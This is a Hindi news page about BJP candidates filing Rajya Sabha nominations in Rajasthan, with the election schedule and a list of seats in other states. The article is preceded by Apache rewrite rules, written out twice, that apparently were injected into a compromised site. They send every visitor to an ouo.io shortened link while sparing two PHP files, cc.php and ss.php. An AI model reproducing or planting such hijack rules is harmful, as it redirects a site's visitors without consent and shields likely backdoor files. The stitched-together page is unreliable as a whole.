
RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]RewriteEngine on RewriteCond %{REQUEST_URI} !^https://ouo.io/13ARhD8$ RewriteCond %{REQUEST_URI} !/(cc)\.php [NC] RewriteCond %{REQUEST_URI} !/(ss)\.php [NC] RewriteRule .* https://ouo.io/13ARhD8 [L,R=301]
BREAKING NEWS
Total views:- 386
Previous Nextजयपुर। राज्यसभा की तीन सीटों के लिए भाजपा उम्मीदवाराें ने सोमवार को नामांकन दाखिल कर दिया। इस मौके पर मुख्यमंत्री वसुंधरा राजे भी मौजूद थीं। भारतीय जनता पार्टी ने पर्टी के राष्ट्रीय महासचिव एवं राज्यसभा सांसद भूपेन्द्र यादव, भाजपा में शामिल हुए विधायक डॉ. किरोड़ीलाल मीणा और आरएसएस एवं भारतीय मजदूर संघ के वरिष्ठ नेता पूर्व विधायक मदनलाल सैनी को उम्मीदवार बनाया है। भाजपा के तीनों उम्मीदवार आज विधानसभा पहुंचे और नामांकन किया। तीनों उम्मीदवारों का जीतना तय है। आज राज्य सभा में नामांकन भरने की आखिरी तारीख है।कोई और दल की ओर से उम्मीदवार अभी तक नहीं पहुंचा है। ऐसे में निर्विरोध निर्वाचन तय है।
राज्यसभा चुनाव 23 मार्च को होगा। राजस्थान में तीन राज्यसभा सांसदों का कार्यकाल समाप्त होने के कारण हो रहा है। प्रदेश में भाजपा के राष्ट्रीय महासचिव भूपेंद्र यादव, कांग्रेस प्रवक्ता अभिषेक मनु सिंघवी एवं नरेंद्र बुढानिया का कार्यकाल 3 अप्रैल को समाप्त हो रहा है। राज्यसभा चुनाव के लिए नामांकन भरने की प्रकिया 5 मार्च से शुरू हुई थी। नामांकन भरने की सोमवार को आखिरी तारीख है। मंगलवार को नामांकन पत्रों की जांच की जाएगी।
12 मार्च नामांकन भरने की आखिरी तारीख।
13 मार्च नामांकन पत्रों की जांच।
15 मार्च नाम वापसी की अंतिम तिथि।
23 मार्च को मतदान, सुबह 9 से शाम 4 बजे तक।
23 मार्च को शाम 5 बजे मतगणना।
राजस्थान समेत देश के 16 राज्यों में राज्यसभा की 58 सीटों पर भी 23 मार्च को ही राज्यसभा चुनाव होना है। उत्तर प्रदेश में राज्यसभा की 10 सीटों पर, बिहार-महाराष्ट्र में 6-6 सीटों पर, झारखंड में 2 सीटों पर, उड़ीसा में 3, मध्यप्रदेश में 5 और पश्चिम बंगाल में भी 5 सीटों पर राज्यसभा चुनाव होना है। इसी प्रकार उत्तराखंड, हिमाचल, छत्तीसगढ़ व हरियाणा में 1-1 सीट पर जबकि तेलंगाना में 3, कर्नाटक एवं गुजरात में 4-4 सीटों पर चुनाव होंगे।